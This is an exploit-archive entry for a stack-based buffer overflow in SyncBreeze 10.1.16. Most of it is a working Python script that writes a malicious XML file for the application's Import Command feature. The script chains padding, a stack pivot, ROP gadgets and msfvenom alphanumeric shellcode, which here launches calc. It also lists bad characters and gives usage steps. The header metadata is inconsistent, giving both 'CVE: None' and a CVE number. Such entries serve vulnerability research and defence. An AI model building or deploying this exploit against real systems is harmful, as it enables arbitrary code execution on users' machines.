SyncBreeze 10.1.16 - XML Parsing Stack-based Buffer Overflow

2021-03-29
ID: 104200
CVE: None
Download vulnerable application: None
# Exploit Title: 
# Date: 03/27/2021
# Author: Filipe Oliveira - filipecenturiao[at]hotmail.com Rafael Machado  - nnszs[at]protonmail.com
# Vendor: https://www.syncbreeze.com/
# Software Link: https://www.4shared.com/file/57pE4sZfiq/syncbreeze_setup_v10116.html
# Version: SyncBreeze v10.1.16 x86
# Tested on: Windows 10 x64 (19042.867)
# CVE: CVE-2017-15950

Usage: The exploit will generate a POC file, called xplSyncBreeze.xml. Launch the application and click on Import Command, then load the POC file. 

# -*- coding: utf-8 -*-
    
import struct

# badchars
#\x00\x0a\x0d\x20\x27
#\x81\x82\x83\x84\x85\x86\x87\x88
#\x89\x8A\x8B\x8C\x8D\x8E\x8F\x90
#\x91\x92\x93\x94\x95\x96\x97\x98
#\x99\x9A\x9B\x9C\x9D\x9E\x9F\xA0
#\xA1\xA2\xA3\xA4\xA5\xA6\xA7\xA8
#\xA9\xAA\xAB\xAC\xAD\xAE\xAF\xB0
#\xB1\xB2\xB3\xB4\xB5\xB6\xB7\xB8
#\xB9\xBA\xBB\xBC\xBD\xBE\xBF\xC0
#\xC1\xC2\xC3\xC4\xC5\xC6\xC7\xC8
#\xC9\xCA\xCB\xCC\xCD\xCE\xCF\xD0
#\xD1\xD2\xD3\xD4\xD5\xD6\xD7\xD8
#\xD9\xDA\xDB\xDC\xDD\xDE\xDF\xE0
#\xE1\xE2\xE3\xE4\xE5\xE6\xE7\xE8
#\xE9\xEA\xEB\xEC\xED\xEE\xEF\xF0
#\xF1\xF2\xF3\xF4\xF5\xF6\xF7\xF8
#\xF9\xFA\xFB\xFC\xFD\xFE\xFF

# Shellcode payload size: 432 bytes
# msfvenom -a x86 --platform windows -p windows/exec CMD=calc -e x86/alpha_mixed BufferRegister=EAX -b '\x00\x0A\x0D\x20\x27' -v shellcode -f python

shellcode =  b""
shellcode += b"\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49"
shellcode += b"\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a"
shellcode += b"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51"
shellcode += b"\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
shellcode += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x6b\x4c\x69"
shellcode += b"\x78\x4e\x62\x75\x50\x77\x70\x35\x50\x45\x30"
shellcode += b"\x4b\x39\x59\x75\x55\x61\x39\x50\x52\x44\x4e"
shellcode += b"\x6b\x42\x70\x50\x30\x6e\x6b\x42\x72\x54\x4c"
shellcode += b"\x6c\x4b\x70\x52\x74\x54\x4c\x4b\x62\x52\x66"
shellcode += b"\x48\x44\x4f\x48\x37\x61\x5a\x51\x36\x45\x61"
shellcode += b"\x39\x6f\x6e\x4c\x75\x6c\x43\x51\x71\x6c\x65"
shellcode += b"\x52\x56\x4c\x47\x50\x4b\x71\x38\x4f\x74\x4d"
shellcode += b"\x37\x71\x49\x57\x38\x62\x7a\x52\x52\x72\x36"
shellcode += b"\x37\x4c\x4b\x63\x62\x42\x30\x6c\x4b\x31\x5a"
shellcode += b"\x57\x4c\x4c\x4b\x32\x6c\x36\x71\x31\x68\x4a"
shellcode += b"\x43\x47\x38\x47\x71\x4a\x71\x76\x31\x6c\x4b"
shellcode += b"\x36\x39\x67\x50\x66\x61\x58\x53\x4c\x4b\x70"
shellcode += b"\x49\x66\x78\x59\x73\x34\x7a\x53\x79\x6e\x6b"
shellcode += b"\x50\x34\x4c\x4b\x66\x61\x4e\x36\x55\x61\x39"
shellcode += b"\x6f\x4c\x6c\x4a\x61\x4a\x6f\x34\x4d\x67\x71"
shellcode += b"\x48\x47\x67\x48\x69\x70\x71\x65\x59\x66\x54"
shellcode += b"\x43\x63\x4d\x79\x68\x75\x6b\x73\x4d\x67\x54"
shellcode += b"\x44\x35\x79\x74\x72\x78\x4e\x6b\x53\x68\x71"
shellcode += b"\x34\x57\x71\x5a\x73\x52\x46\x6c\x4b\x36\x6c"
shellcode += b"\x72\x6b\x6c\x4b\x76\x38\x75\x4c\x67\x71\x68"
shellcode += b"\x53\x6e\x6b\x57\x74\x4e\x6b\x63\x31\x78\x50"
shellcode += b"\x6f\x79\x73\x74\x47\x54\x64\x64\x53\x6b\x31"
shellcode += b"\x4b\x63\x51\x50\x59\x63\x6a\x43\x61\x39\x6f"
shellcode += b"\x59\x70\x73\x6f\x31\x4f\x62\x7a\x4e\x6b\x44"
shellcode += b"\x52\x6a\x4b\x4e\x6d\x53\x6d\x73\x5a\x63\x31"
shellcode += b"\x4c\x4d\x4d\x55\x6f\x42\x75\x50\x47\x70\x33"
shellcode += b"\x30\x46\x30\x50\x68\x74\x71\x6c\x4b\x42\x4f"
shellcode += b"\x6e\x67\x39\x6f\x6e\x35\x6f\x4b\x58\x70\x78"
shellcode += b"\x35\x79\x32\x46\x36\x33\x58\x79\x36\x4c\x55"
shellcode += b"\x4f\x4d\x6d\x4d\x39\x6f\x6a\x75\x55\x6c\x63"
shellcode += b"\x36\x61\x6c\x45\x5a\x6d\x50\x49\x6b\x39\x70"
shellcode += b"\x32\x55\x75\x55\x6d\x6b\x57\x37\x64\x53\x74"
shellcode += b"\x32\x52\x4f\x50\x6a\x53\x30\x61\x43\x59\x6f"
shellcode += b"\x78\x55\x73\x53\x30\x61\x30\x6c\x72\x43\x43"
shellcode += b"\x30\x41\x41"


# padding to crash buffer
basura = struct.pack('<L', 0x41414141) * 390

# gadgets to move payload pointer into EAX
GAD1 = struct.pack('<L', 0x65235465) # XCHG EAX,EBP
GAD2 = struct.pack('<L', 0x6506537C) # CALL EAX

# padding to reach buffer address stored in ebp
basura2 = struct.pack('<L', 0x41414141) * 56

# padding for stack pivot

padding = struct.pack('<L', 0x41414141) * 4
padding2 = struct.pack('<L', 0x41414141) * 20

# stack pivot to reach an area with more space for gadgets on the stack
# 0x6506491c: add esp, 0x48 ; pop edi ; pop esi ; ret

pivot = struct.pack('<L', 0x6506491c)

# final payload

fruta = basura + pivot + padding + padding2 + GAD1 + GAD2 + basura2 + shellcode


# write payload to xml file

payload = open("xplSyncBreeze.xml", "wb")
payload.write("<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\n".encode('utf-8'))

payload.write("<sync name='".encode('utf-8'))
payload.write(fruta)
payload.write("'>\n</sync>\n".encode('utf-8'))

payload.close()
1-4-2 (www01)